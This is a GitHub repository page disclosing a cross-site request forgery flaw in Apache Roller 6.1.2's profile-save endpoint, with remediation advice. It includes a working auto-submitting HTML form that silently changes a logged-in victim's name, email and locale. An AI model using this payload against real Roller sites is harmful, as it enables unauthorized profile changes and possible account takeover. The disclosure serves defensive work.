Skip to content

vanlam2001/roller-csrf

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

2 Commits
.gitattributes
.gitattributes
 
 
README.md
README.md
 
 
poc.html
poc.html
 
 
poc.txt
poc.txt
 
 

Repository files navigation

Apache Roller v6.1.2 - Cross-Site Request Forgery (CSRF) in Profile Update

Vulnerability Details

Overview

Roller v6.1.2 and below was discovered to contain a Cross-Site Request Forgery (CSRF) vulnerability in the endpoint /roller/roller-ui/profile!save.rol.

This vulnerability allows attackers to arbitrarily update the victim user's profile information (e.g., email, full name, locale, timezone) via a crafted HTML page.

Proof of Concept

The vulnerability allows unauthorized requests to /roller/roller-ui/profile!save.rol that update the user's profile without CSRF protection.

HTML Exploit Code

<html>
<head>
    <form id="exploitForm" action="http://localhost:8080/roller/roller-ui/profile!save.rol" method="POST">
        <input name="bean.userName" value="vanlam" type="hidden">
        <input name="bean.screenName" value="hacked" type="hidden">
        <input name="bean.fullName" value="hacked" type="hidden">
        <input name="bean.emailAddress" value="[email protected]" type="hidden">
        <input name="bean.passwordText" value="" type="hidden">
        <input name="bean.passwordConfirm" value="" type="hidden">
        <input name="bean.locale" value="vi_VN" type="hidden">
        <input name="bean.timeZone" value="Asia/Bangkok" type="hidden">
    </form>

    <script>
        document.getElementById('exploitForm').submit();
    </script>
</head>
</html>

Form Parameters

  • bean.userName: vanlam
  • bean.screenName: hacked
  • bean.fullName: hacked
  • bean.emailAddress: [email protected]
  • bean.passwordText: (empty)
  • bean.passwordConfirm: (empty)
  • bean.locale: vi_VN
  • bean.timeZone: Asia/Bangkok

Impact

An attacker can craft a malicious HTML page that, when visited by an authenticated Roller user, will automatically submit a form to update the victim's profile information without their consent. This can lead to:

  • Unauthorized changes to user profile data
  • Potential account takeover if email address is changed
  • Disruption of user experience through locale and timezone changes

Remediation

  • Implement CSRF tokens for all state-changing requests
  • Validate the Origin and Referer headers
  • Use same-site cookies
  • Implement proper authentication and authorization checks

About

No description, website, or topics provided.

Resources

Readme
Activity

Stars

0 stars

Watchers

0 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

No packages published

Languages